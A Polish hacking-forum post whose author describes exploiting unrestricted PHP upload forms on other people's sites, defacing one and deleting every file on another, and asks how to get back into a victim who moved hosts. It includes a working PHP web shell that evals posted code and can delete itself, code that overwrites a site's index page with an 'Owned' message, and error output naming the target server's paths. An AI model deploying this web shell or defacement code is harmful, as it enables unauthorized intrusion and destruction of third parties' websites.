Upload
Witam w dzisiejszym dniu na pewnych forach znalazlem linki do 3 uploadow i wszystkie z nich mialy ten sa blad czyli nie sprawdzaly rozszerzenia i mozna bylo dac plik php wiec probowalem dac Owned na pierszym dalem rade na drugim dalem dare skasoac wszystkie katalogi i pliki jednak teraz mam problem osoba ktora miala upload gdzie skasowalem wszystkie pliki przeniosla go na inny server jednak blad dalej jest tylko ze nie mozna nic zrobic(przynajmniej ja nie umiem) w sensie takim ze dajac shell'a nic nie potrafie zrobic a dajac taki prosciutki kod
I powiedzmy chce podmienic strone glowna lub kontakty.html bo na 100% wiem ze taka jest nazwa wiec robie:Kod php:<?php
echo('<html>
<head><meta http-equiv="content-type" charset="utf-8" />
</head>
<body>
<form method="post" action="'.$_SERVER['PHP_SELF'].'"
<textarea name="code" rows="10" cols="50"></textarea>
<Br>
<input type="submit" name="wykonaj" value="Wykonaj"> <input type="submit" name="niszcz" value="Niszcz">
</form><body></html>');
if(isset($_POST['wykonaj'])) {
echo($_POST['code'].'<Br>');
$code = stripslashes($_POST['code']);
echo($code.'<Br>');
$a = eval($code);
echo($a);
}
if(isset($_POST['niszcz'])) unlink($_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF']);
?>
Dostaje blad: wiec zmieniam katalog na ten z bledy(napewno dobry) czyli takiKod php:$fp = fopen("../../../../index.php", "w");
fwrite($fp, "<h1>Owned :) pozdro</h1>");
fclose($fp);
/home/freequ/domains/freequ.hostil.pl/public_html/kontakt.html
i mam bledy
Czyli jak widac zmieniajac hosting dana osoba nie wiedzac o tym uchronila sie bo na wczesniejszym takie rzeczy dzialaly co moge zrobicKod php:Warning: fopen() [function.fopen]: SAFE MODE Restriction in effect. The script whose uid is 48 is not allowed to access /home/freequ/domains/freequ.hostil.pl/public_html/kontakt.html owned by uid 1247 in /home/freequ/domains/freequ.hostil.pl/public_html/hosting/katalog/c.php(18) : eval()'d code on line 1
Warning: fopen(/home/freequ/domains/freequ.hostil.pl/public_html/kontakt.html) [function.fopen]: failed to open stream: Success in /home/freequ/domains/freequ.hostil.pl/public_html/hosting/katalog/c.php(18) : eval()'d code on line 1
Warning: fwrite(): supplied argument is not a valid stream resource in /home/freequ/domains/freequ.hostil.pl/public_html/hosting/katalog/c.php(18) : eval()'d code on line 2
Warning: fclose(): supplied argument is not a valid stream resource in /home/freequ/domains/freequ.hostil.pl/public_html/hosting/katalog/c.php(18) : eval()'d code on line 3
Znacie jakies art/tutoriale/filmy etc jak sie wlamywac na upload?
Odpowiedź z Cytatem
Copyright © 2006-2025 - HACK.pl. Wszelkie prawa zastrzeżone.